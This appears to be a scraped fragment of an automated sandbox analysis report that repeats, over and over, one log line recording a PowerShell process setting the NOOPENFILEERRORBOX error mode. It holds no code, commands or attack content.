          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
